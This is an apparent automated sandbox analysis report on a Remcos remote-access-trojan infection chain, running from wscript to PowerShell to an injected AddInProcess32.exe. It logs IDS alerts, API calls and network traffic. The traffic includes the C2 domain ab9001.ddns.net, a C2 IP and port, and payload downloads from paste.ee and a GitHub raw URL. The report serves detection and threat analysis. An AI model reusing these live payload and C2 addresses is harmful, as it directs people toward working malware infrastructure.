            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0041A01B FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,10_2_0041A01B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0040B28E FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,10_2_0040B28E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0040838E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,10_2_0040838E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_004087A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,10_2_004087A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_00407848 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,10_2_00407848
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_004068CD FindFirstFileW,FindNextFileW,10_2_004068CD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0044BA59 FindFirstFileExA,10_2_0044BA59
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0040AA71 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,10_2_0040AA71
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_00417AAB FindFirstFileW,FindNextFileW,FindNextFileW,10_2_00417AAB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0040AC78 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,10_2_0040AC78
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_00406D28 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,10_2_00406D28
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start MenuJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppDataJump to behavior

            Software Vulnerabilities

            barindex
            Suspicious execution chain found
            Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:55396 -> 64.188.16.157:23782
            Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:55594 -> 64.188.16.157:23782
            Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:55924 -> 64.188.16.157:23782
            Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:55821 -> 64.188.16.157:23782
            Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:55993 -> 64.188.16.157:23782
            Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:56037 -> 64.188.16.157:23782
            Source: Network trafficSuricata IDS: 2841075 - Severity 1 - ETPRO MALWARE Terse Request to paste .ee - Possible Download : 192.168.2.5:49718 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2020423 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 : 188.114.97.3:443 -> 192.168.2.5:49718
            Source: Network trafficSuricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1 : 188.114.97.3:443 -> 192.168.2.5:49718
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: ab9001.ddns.net
            Connects to a pastebin service (likely for C&C)
            Source: unknownDNS query: name: paste.ee
            Uses dynamic DNS services
            Source: unknownDNS query: name: ab9001.ddns.net
            Uses ping.exe to check the status of other devices and networks
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
            Source: global trafficTCP traffic: 192.168.2.5:55396 -> 64.188.16.157:23782
            Source: global trafficTCP traffic: 192.168.2.5:55395 -> 1.1.1.1:53
            Source: global trafficHTTP traffic detected: GET /NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /d/XlUYO/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 13.107.246.45 13.107.246.45
            Source: Joe Sandbox ViewIP Address: 13.107.246.44 13.107.246.44
            Source: Joe Sandbox ViewIP Address: 13.107.246.60 13.107.246.60
            Source: Joe Sandbox ViewIP Address: 185.199.110.133 185.199.110.133
            Source: Joe Sandbox ViewJA3 fingerprint: 1138de370e523e824bbca92d049a3777
            Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: unknownHTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49710 version: TLS 1.0
            Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
            Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
            Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
            Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
            Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
            Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
            Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
            Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
            Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
            Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
            Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
            Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
            Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
            Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
            Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
            Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
            Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
            Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
            Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
            Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
            Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
            Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
            Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
            Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
            Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
            Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
            Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
            Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
            Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
            Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
            Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
            Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
            Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
            Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
            Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
            Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
            Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
            Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
            Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
            Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
            Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
            Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
            Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_00424A66 recv,10_2_00424A66
            Source: global trafficHTTP traffic detected: GET /NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=dx+SZ2r9+LVmadL&MD=TD8vCUGP HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
            Source: global trafficHTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /d/XlUYO/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /scripts/c/ms.jsll-4.min.js HTTP/1.1Host: js.monitor.azure.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://learn.microsoft.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
